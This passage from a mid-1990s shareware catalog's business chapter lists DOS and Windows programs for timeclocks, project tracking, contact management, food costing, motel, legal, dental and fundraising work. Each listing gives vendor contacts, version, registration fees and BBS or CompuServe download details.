baud modem) + Description: + An easy to use, menu driven program designed exclusively for + matching employees for car or van pooling. Written in a + mainframe programming language it is extremely fast and has + unlimited record capacity. It will even consider the shift the + employee works before matching. View the information on screen + or print to a report. Supports lasers and dot-matrix and can + also print to a file. + + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 350. + + Product: Service Call Manager + Manage service calls & information. See full description on + page 351. + + Product: TASK MASTER + Project tracking program. See full description on page 353. + + Product: TimeCapture + Author: Versatile Software Solutions, Inc., 513-878-0315 + Version: 2.4 (08-11-93) + Needs: IBM PC, DOS 3.3 or better. 256k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $59.00 (add $1.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 3-month return + policy; discounts on other products. + Look for: availability unknown on BBSs; CLCK24.ZIP on CompuServe + in CIS:IBMAPP forum LIBrary 6 (or contact userID 71155,614 for + assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Easy-to-use employee time clock program with password-protected + file manager eliminates the hassle of collecting and totaling + employee hours worked. Ensures employees remember to record + all times by "reminding" them if they forget. At your + discretion, you can allow employees to record "forgotten" + times. You can add times for when employees are not actually at + your work site (attending seminars, etc). Context-sensitive + help screens throughout. Uncomplicated yet full-featured! + + Chapter 7, "Business" 347 + + + + Product: Timeclock I + Author: Faught Data Systems, Inc., 800-394-4839 + Version: 2.4s (04-15-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $79.95 (add $2.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of tollfree 800# phone, newsletter + support; LAN license; bonus utilities; discounts on other + products. + Look for: TC24S.ZIP on BBSs; TC24S.EXE on CompuServe in + CIS:IBMAPP forum LIBrary 6 (or contact userID 73770,1574 for + assistance). + Download size: 303k (about 23 minutes with a 2400 baud modem) + Description: + Turn your PC into a timeclock and save hundreds of dollars! + Logs employees' "in" and "out" times via keyboard or barcode + and automatically tabulates their hours at the end of each pay + period. Calculates overtime and tracks sick, vacation and + holiday hours. Tracks project/billable hours and if your + networked, employees can "punch" right from their own stations. + Send announcements via the program's bulletin board, or private + messages to individual employees. Eliminates mistakes and + saves time. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 357. + + Product: x-OUT3 + Network in/out tracking system. See full description on + page 433. + + Product: x-OUT4 + Network in-out tracking system for Windows. See full + description on page 434. + + + 7.6 Project management + + Product: Car Restoration Diary + Data tracking for vintage auto restoration. See full + description on page 275. + + Product: Chartist(tm) + Flowcharting and org charting. See full description on + page 553. + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 638. + + Chapter 7, "Business" 348 + + + + Product: DAYO SERVICE DISPATCH + Author: TJS LAB, Inc., 407-291-3960 + Version: 3.20+ (03-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $299.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOS1.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOS1.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Designed for service and/or repair businesses, departments, or + organizations. Use it to initiate service or work orders, + record any notes, dispatch technicians, record inventory and + labor used, and then close and create an invoice for services + rendered. Features include: customer and inventory maintenance, + warehouse transfers, pick tickets or pull sheets, invoicing, + laser forms, and many reports. + + + Product: RPMSHARE + Author: South Pointe Software, 604-538-2326 + Version: 3.42 (12-05-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; EGA monitor; Hard + disk; EMS memory. + Strongly recommended: VGA monitor; HP LaserJet printer; Mouse. + Registration fee: $69.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; all ASP-wide + offers (see page 6); discounts on upgrades. 12-month free + upgrading allowed. 4 free update disk(s) sent out. Employee + time/assignment planning literature. + Look for: RPMSHA.EXE on BBSs; RPMSHA.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 6 (or contact userID 70254,3443 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + A multi-resource/multi-projects management program unlike any + other. Very attractive to the horizontal market of individual, + small firm and home office users. It shows who is over/ + underloaded, by how much in hours and currency, on which + projects/assignments, and on what dates. + + Chapter 7, "Business" 349 + + + + Product: Service Call Manager + Author: CPI computer services, 702-329-6868 + Version: 2.0 (02-08-95) + Needs: IBM AT (80286), DOS 3.3 or better. + Registration fee: $85.00 (add $5.00 for shipping to U.S. + addresses) (add $7.50 for shipping to Canadian addresses) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + Helps you manage service calls. You can track the status of the + calls, wheather they are closed, what the technician did while + on site and what parts were used. Can be adapted to many type + of service organizations, such as appliance repair, computer + repair, etc. + + + Product: TreeChart + Comprehensive package for organization charts. See full + description on page 357. + + 7.6.1 Project bidding & costing + + Product: DXF Bill of Materials Generator + Bills of materials from AutoCAD DXF files. See full + description on page 418. + + Product: ProDev*EPRICE + Author: Pro Dev Software, 616-788-2243 + Version: 6.0 (12-06-94) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; CGA monitor; Hard + disk. ProDev*QUOTE software. + Registration fee: $30.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support. + Look for: PDEPRIC6.ZIP on BBSs. + Download size: 283k (about 21 minutes with a 2400 baud modem) + Description: + Provides for converting weekly price service data files for + electrical, heating, plumbing and air conditioning items to the + ProDev*QUOTE file format to automatically update material + prices. Includes sample files for USA, Australian and UK price + services. The user subscribes separately to the desired price + service. + + Chapter 7, "Business" 350 + + + + Product: ProDev*QUOTE Quote/Bid System + Author: Pro Dev Software, 616-788-2243 + Version: 6.0c (05-24-95) + Needs: IBM PC, DOS 2.1 or better. 512k RAM; Hard disk. + Registration fee: $65.00 (Canadian dollars) (add $5.00 (Canadian + dollars) for shipping to U.S. addresses) (add $5.00 (Canadian + dollars) for shipping to Canadian addresses) (add $8.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support. + 3-month return policy. + Look for: PDQUOT6C.ZIP on BBSs. + Download size: 418k (about 31 minutes with a 2400 baud modem) + Description: + Packed with features for any type/size business from + consultants to one-person contractors to small/large + manufacturers. Used by many electrical, heating, plumbing, + remodeling, major construction contractors, florists, flooring + stores, landscape contractors, printing shops, maintenance + services, well... just about any type business. The system + defaults are highly configurable. Pull-down menus, point & + shoot browse and F1 help windows. + + + Product: A Project/Event Planner + Planner for projects, time-based activities. See full + description on page 352. + + Product: Timeclock I + Employee timeclock with reports. See full description on + page 346. + + 7.6.2 Project scheduling + + Product: Calendar Quick + Scheduling tool. See full description on page 343. + + Product: Personal Schedule + Comprehensive calendar/schedule/proj mgr/PIM. See full + description on page 151. + + Chapter 7, "Business" 351 + + + + Product: A Project/Event Planner + Author: Sapphire Software Inc., 808-395-5587 + Version: 3.4 (12-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $37.00 + Registration benefits: printed manual; 31/2" master disk(s); 12 + months of unlimited phone, CompuServe, mail support; 1-month + limited return policy; bonus utilities; discounts on upgrades. + Look for: APLANR34.ZIP on BBSs; APLANR.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 0 (or contact userID 71223,3653 for + assistance). + SWREG#: 750 + PsL#: 11168 + Download size: 282k (about 21 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + (Finalist in 1994 PC Magazine/Ziff-Davis Shareware Awards) Use + for quick overall project planning, activity and resource + scheduling. Can assign income/cost amounts to events/resources + to estimate project income/cost. Can link events where start/ + end times are automatically calculated. Can shift all events + forward/backward in time. Handles multiple calendars. Allows + free-from drawing of events anywhere on a scale of hr/day/week/ + month/yr. On-line help, sample plans provided. + + + Product: TASK MASTER + Author: RKS Software, Inc., 703-534-1726 + Version: 2.4c (11-24-93) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; Hard + disk. + Registration fee: $39.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; lifetime return policy; royalty-free runtime + license; LAN license; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: TM24C.ZIP on BBSs (call 703-534-7812 to download it at + no charge); TM24C.ZIP on CompuServe in CIS:IBMAPPS forum + LIBrary 6 (or contact userID 72357,2034 for assistance). + SWREG#: 368 + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A project tracking program which allows you to easily keep + track of office assignments, correspondence, projects, and + tasks of any kind. Features automatic status updating, report + writer, form letter utility, appointment calendar, & query + builder. All international date formats. Unlimited records. + Standard dBase data file. + + Chapter 7, "Business" 352 + + + + 7.7 Client management + + Product: 2DO Personal Task Manager + Personal task and contact manager for Windows. See full + description on page 165. + + Product: THE CALLING TREE + Calling tree database manager. See full description on + page 364. + + Product: DAYO BAR CODE 3 OF 9 + Print 3 of 9 barcodes onto Epson/IBM printer. See full + description on page 333. + + Product: DAYO MEMBERSHIP + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.40+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $95.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYODE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYODE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + An application designed to track membership for an association + or organization. The ability to maintain records for donations, + dues, payments and/or invoices has also been incorporated into + the package. Use it to record member information and + optionally, maintain a simple accounting system for dues and/or + donations. Many reports and reporting routines are included in + this package, ie: members list, notes, statements, labels, + payments, form letters and much more. + + + Product: DAYO SALES MANAGEMENT SYSTEM + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.42+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $189.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 353 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOCE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYOCE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + Designed to aid the business or, individual sales person, in + the creation of price books and quotes/sales orders, and in the + management of contracts and calendar events. It is by default a + multiuser system, allowing almost unlimited numbers of users to + have the aility to simultaneously access the same data on a PC + based LAN/network. + + + Product: DAYO TIME & BILLING + Inventory, invoicing, receivables, projects. See full + description on page 314. + + Product: LABEL MASTER + Mailing list manager - PC Mag editors choice. See full + description on page 284. + + Product: The Lawyer's DeskTop + Integrated legal management system. See full description on + page 361. + + Product: Little Black Book + Autodialer/'rolodex' program. See full description on + page 155. + + Product: NAMEBASE + Author: Elk Creek Software + Version: 3.2 (02-26-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Modem. + Registration fee: $25.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support. + Look for: NAME32.ZIP on BBSs; NAME32.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 7 (or contact userID 70640,1614 for + assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Keeps track of people and companies. Stores 4 phone numbers, 2 + addresses, 2 dates, and thousands of characters of notes for + each record. Full mouse support. Prints a pocket-size address + book, labels, rolodex cards, envelopes, and reports. Creates + mail-merge files for use with most word processors. Dials the + + Chapter 7, "Business" 354 + + + + phone. Displays multiple records at once. Extremely easy to + use. Type the first few characters of any person's name and + you are immediately viewing all information about that person. + + + Product: Personal Hotnet + Author: Robichaux and Associates, 713-463-7452 + Version: 4.0 (09-30-93) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $49.00 (add $3.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); discounts on upgrades. + Look for: HOTNET.ZIP on BBSs; PERHOT.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 7 (or contact userID 71336,336 for + assistance); HOTNET.ZIP on GEnie in IBMPC forum LIBrary 0 (or + contact userID JEROBICHAUX for assistance). + Download size: 420k (about 31 minutes with a 2400 baud modem) + Description: + Whether you call it a help desk, a customer support center, a + or a trouble desk, telephone technical support can be a beast! + This helps by logging problem calls and solutions and easily. + Track calls, recycle solutions with powerful searches. Use + "crib Sheets" and access common information with a hotkey. + Comes in single and multiuser, can run TSR. Describe problems + in the caller's own words with a free-form comments field. + + + Product: ProAct Contact Management + Home/business contact manager. See full description on + page 375. + + Product: RPMSHARE + RPM/resources and projects manager. See full description on + page 348. + + Product: Service Call Manager + Manage service calls & information. See full description on + page 348. + + Product: Shareware Tracker + Data tracking program for shareware authors. See full + description on page 717. + + Product: Timeclock I + Employee timeclock with reports. See full description on + page 346. + + + 7.8 Organization charts + + See also: Graphics, Drawing/editor programs. + + Chapter 7, "Business" 355 + + + + Product: EDGEFLOW + Flowcharting and diagramming tool for DOS. See full + description on page 554. + + Product: Top Draw + Powerful object-oriented drawing program. See full description + on page 557. + + Product: TreeChart + Author: FineLine Software, (+353)-91-37560 + Version: 2.00 (08-23-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: Mouse. TrueType or ATM fonts. + Registration fee: $42.00 (add $13.86 for shipping to U.S. + addresses) (add $13.86 for shipping to Canadian addresses) (add + $13.86 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; lifetime return policy; bonus utilities; all ASP-wide + offers (see page 6). 6-month free upgrading allowed. + Look for: TCF200.ZIP on BBSs; TCF200.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 70624,462 for + assistance). + SWREG#: 1927 + PsL#: 11053 + Download size: 550k (about 41 minutes with a 2400 baud modem) + Description: + A package for organization charts or illustrating other + hierarchical information. No drawing skills required: box + sizing, positioning and line routing all done automatically. + Numerous chart styles/box shapes. Layouts (style guides) for + consistent appearance. Print preview, fit-to-page, + titles+border. Outlining: view/print chart, management or + single departments. Supports assistants and shared employees. + Imports text, exports text & fully scaleable WMF pictures. + + + 7.9 Specific-field systems + + 7.9.1 Construction, installation & repair + + Product: J-Works + Author: MicroWorks Inc., 615-896-3966 + Version: 2.2 (03-01-95) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: VGA monitor; Hard disk; HP LaserJet + printer; Mouse; Epson printer. + Registration fee: $25.00 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 3 months of unlimited phone, fax, + mail support; 1-month return policy; all ASP-wide offers (see + + Chapter 7, "Business" 356 + + + + page 6); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. 1 free update disk(s) sent + out. Printed manual, 90 day free technical support. + Look for: JWORKS22.ZIP on BBSs. + Download size: 306k (about 23 minutes with a 2400 baud modem) + Description: + Automates the process of calculating the load for a house to + determine the correct size heating and cooling system required. + It requires that you use ACCA's Manual J booklet to insert the + correct HTM's for your particular region. You then insert the + building dimensions for your house and it does the rest. + Supports "Room-by-Room" and "Whole-house" load calcul ations. + Mouse support. Includes a CFM calculator, auto print capability + for presentation to customers. + + + 7.9.2 Farming & ranching + + Product: Grow'Em + Grow from seed/cuttings. Easy, slick, great. See full + description on page 604. + + Product: HortMan + Horticultural manager. See full description on page 604. + + 7.9.3 Food services + + Product: INVENTORY & COST CONTROL + Author: First Step Software, 208-376-4411 + Version: 4.2 (01-15-94) + Needs: IBM PC, DOS 3.2 or better. 300k RAM; Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer. + Registration fee: $150.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: INVCTL42.ZIP on BBSs; INVCTL.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 316k (about 24 minutes with a 2400 baud modem) + Description: + Designed for multi unit food service with central purchasing. + Record central or direct unit receiving or issue to and from + units. Maintains Perpetual inventory of central storage. + Inventory tools such as location coding almost make the job of + controlling inventory enjoyable! Purchasing history by product + and by vendor. Shortage reports based on par levels. Receiving + reports by day, week or whatever. P&L reports by profit center + - excellent tool for analysis and budgeting. Basis for recipe + cost. + + Chapter 7, "Business" 357 + + + + Product: Managing Your Food + Author: MYF Software, 805-398-1449 + Version: 4.51 (01-01-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: Mouse. + Registration fee: 35.00US (add 5.00US for shipping to Canadian + addresses) (add 5.00US for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, mail support; bonus + utilities; all ASP-wide offers (see page 6). 12-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: MYF*.ZIP on BBSs (call 805-682-6158 to download it at + no charge). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + A complete food manager designed for food manufacturers, + institutional food planners and cooks, restaurant managers, + dietitians, diabetics, bakers, and the home shopper. Its use is + easy enough for the novice, yet comprhensive enough for the + professional. Will track cost, protein, carbohydrates, fat, + calories, cholesterol, fatty acids, fiber, vitamins, minerals, + food exchanges, and %RDA. Outputs hundreds of reports including + NLEA label information. + + + Product: PC-FOOD II FOOD COSTING + Author: SCHRECK SOFTWARE, 612-731-6822 + Version: 7.02 (06-03-95) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Hard disk. + Strongly recommended: CGA monitor. + Registration fee: $57.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); 12 months of phone, CompuServe, + mail support; discounts on upgrades. + Look for: PCFD702.ZIP on BBSs. + Download size: 186k (about 14 minutes with a 2400 baud modem) + Description: + Calculates and maintains food cost and required selling prices. + Edit portion sizes, expected waste, ingredient costs, serving + sizes, etc. and see the effect on costs and margins. Print + reports including required price changes based on user variance + criteria. Calc total revenue, food cost and gross profit for a + banquet, etc. User selectable sorted displays. Up to 30 + ingredients in a recipe. Up to 30 ingredients and or recipes + in a menu item. Full mouse support. + + Chapter 7, "Business" 358 + + + + Product: RECIPE FILE MANAGEMENT + Author: First Step Software, 208-376-4411 + Version: 3.3 (02-01-94) + Needs: IBM PC, DOS 3.2 or better. 250k RAM; Hard disk. + Strongly recommended: VGA monitor; HP DeskJet printer. + Registration fee: $95.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: RECMGT33.ZIP on BBSs; RECMGT.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 219k (about 17 minutes with a 2400 baud modem) + Description: + A kitchen production tool: + 1. Maintain file for fast access to edit or print recipe. + 2. Adjust recipe yields in a flash. + 3. Resource for many food product weight & measure + equivalent. + A management tool: + 1. Update cost of one or all recipes in file. + 2. Generate shopping/pull list of selected recipes. + 3. Access inventory software for current cost data. + Can run as a stand alone or interface with inventory software. + + + Product: RESTAURANT COST CONTROL + Author: First Step Software, 208-376-4411 + Version: 4.2 (01-15-94) + Needs: IBM PC, DOS 3.2 or better. 300k RAM; CGA monitor; Hard + disk. + Registration fee: $95.00 (add $3.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3-month return policy; bonus utilities. + 12-month free upgrading allowed. + Look for: RSTCTL42.ZIP on BBSs; RSTCTL.ZIP on CompuServe in + CIS:IBM forum LIBrary 15 (or contact userID 71242,1414 for + assistance). + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + Offers management a state of the art tool to sharpen purchasing + practices, tighten inventory levels and provide cost analysis + for budgeting. Physical inventory functions provide a wide + varity of forms, reports and calculations that make the job of + controlling inventory easier and faster. Profit & Loss analysis + will save you $$$$$. Paying vendors is fast and flexible; cash, + manual check or printed check. Provides cost data base for our + Recipe File Management software. + + Chapter 7, "Business" 359 + + + + 7.9.4 Hotel/motel management + + Product: Book-It + Membership and activity booking system. See full description + on page 367. + + Product: MotelMAX + Author: MKM Software, 504-885-7470 + Version: 2.10 (05-01-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; Hard disk. + Strongly recommended: EGA monitor. + Registration fee: $135.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $11.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of CompuServe, mail support; all ASP- + wide offers (see page 6). + Look for: MOTEL210.ZIP on BBSs; MTLMAX.ZIP on CompuServe in + CIS:IBMAPPS forum LIBrary 15 (or contact userID 72704,3566 for + assistance). + PsL#: 10928 + Download size: 365k (about 27 minutes with a 2400 baud modem) + Description: + Includes reservations, advance deposits, front desk, + accounting, general ledger, travel agent commissions, guest + history, room inventory, folio reprints and many, many reports. + One key check-in/check-out. Supports international date and + currency formats. Automatically assigns room rates for up to + 10 room types. Password protected. + + + 7.9.5 Legal & law enforcement + + Product: CHRONOS + Interactive historical timelines. See full description on + page 538. + + Chapter 7, "Business" 360 + + + + Product: The Lawyer's DeskTop + Author: DataPro Enterprises, Inc., 713-978-7431 + Version: 2.1 (07-25-94) + Needs: IBM AT (80286), DOS 3.3 or better. 430k RAM; CGA monitor; + Hard disk; HP LaserJet printer; Epson printer. + Strongly recommended: EGA monitor. + Registration fee: $79.95 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, newsletter, mail support; 2-month return + policy; bonus utilities. + Look for: availability unknown on BBSs; LDT.ZIP on CompuServe in + CIS:LAWSIG forum LIBrary 5 (or contact userID 73654,205 for + assistance). + SWREG#: 1578 + Download size: 533k (about 40 minutes with a 2400 baud modem) + Description: + A legal management work group application that provides an + integrated approach to law office management for the small to + medium size law firm and solo practicioners. It contains case/ + matter management, document management, time and billing, + calendaring (to dos and appointments), docket control, case + critical date tickling, contact managment, payables, a full + text search engine, utilities and much more. + + + Product: SMALL BUSINESS ADVISOR + Expert tax/legal help for small businesses. See full + description on page 369. + + 7.9.6 Library + + See also: Education, Library/bibliography. + + Product: BIBLOGIC + Bibliographic reference database manager. See full description + on page 246. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 342. + + Product: REFILE + Document management software. See full description on + page 524. + + Product: RMS-III: Ref.Mgn.Sys. + Menu based biblio/reference system. See full description on + page 246. + + Chapter 7, "Business" 361 + + + + 7.9.7 Medical & dental + + Product: LEANER + Weight control charting & motivation program. See full + description on page 612. + + Product: Tolman Dental Program + Author: Peter T. Smith D.D.S., 516-281-5544 + Version: 5.0 (04-01-94) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Registration fee: $599.00 + Registration benefits: Printed manual, bonus data files, six + months phone support. + Look for: TOLMAN#.ZIP on BBSs (multiple files) (call ALL-ASP-BBS + to download it at no charge); TOLMN*.ZIP on CompuServe in + CIS:DBADVISOR forum LIBrary 8 (multiple files) (or contact + userID 72617,70 for assistance); TOLMAN#.ZIP on GEnie in + DATABASE forum LIBrary 4 (multiple files) (or contact userID + XMG16757 for assistance). + Download size: 480k (about 36 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + A CompuServe Magazine (Dec '91) pick as a "Current Hit," is an + efficient management program for a mid-size dental office. With + electronic claims, it is not incomplete. It will handle + billing, recalls, insurance, referral tracking, a variety of + patient lists, production reports, mail merge and more. With + online help, look-up windows and a User's Manual, the program + is easy to learn. It was used/improved in the dentist/author's + office for 4 years before release. + + + 7.9.8 Non-profit businesses + + 7.9.8.1 Fund raising + + Product: FundRaiser Basic + Author: Professional Support Software, 417-256-4280 + Version: 1.32 (03-08-95) + Needs: IBM PC, DOS 3.1 or better. 510k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $48.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited phone, fax, CompuServe, mail support; 2-month return + policy; site license; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades. 1 free + + Chapter 7, "Business" 362 + + + + update disk(s) sent out. Booklet on successful fundraising + tips & techniques. + Look for: FRB132.ZIP on BBSs; FRB132.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 15 (or contact userID 72077,1015 for + assistance). + SWREG#: 4530 + Download size: 457k (about 34 minutes with a 2400 baud modem) + Description: + Very easy to learn and use. Here are the tools you need to + fundraise like a real professional. In one typical session, + you can: record donations, make address changes, code donors, + print timely thank you letters and labels, print a deposit + report - all without leaving the program! Targeted mailings + are a snap, as are the impressive and useful reports. Now, + import you existing mailing list easily and quickly. + + + 7.9.9 Political parties + + Product: THE CALLING TREE + Author: IN/QUEST, LLC, 303-671-0800 + Version: 1.7a (08-31-94) + Needs: IBM PC, DOS 2.11 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hercules monitor; Hayes-compatible modem; Epson printer. + Strongly recommended: VGA monitor. + Registration fee: $29.00 (add $5.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: ZTREE17.ZIP on BBSs (call 303-665-6091 to download it + at no charge); ZTREE.ZIP on CompuServe in CIS:IBMAPP forum + LIBrary 16 (or contact userID 70505,531 for assistance); + ZTREE14.EXE on GEnie in IBMPC forum LIBrary 3 (or contact + userID XTY25572 for assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Mananage tree like organization data. Instances where one + person is related to several others and they each in turn are + related to several other and so one until the outer limits of + the tree are reached. Sort of like a contact manager for + political party information matrixes, network marketing MLM + companies, and emergency contact systems where I may call 5 + people and they each in turn will call 5 people and so on until + all members of the tree have have the word. + + + 7.9.10 Real estate + + Product: Financial Analysis For Windows + Analyze large variety of financial instrument. See full + description on page 393. + + Chapter 7, "Business" 363 + + + + Product: Home Plan + Draw, print, edit & save house plans. See full description on + page 566. + + Product: 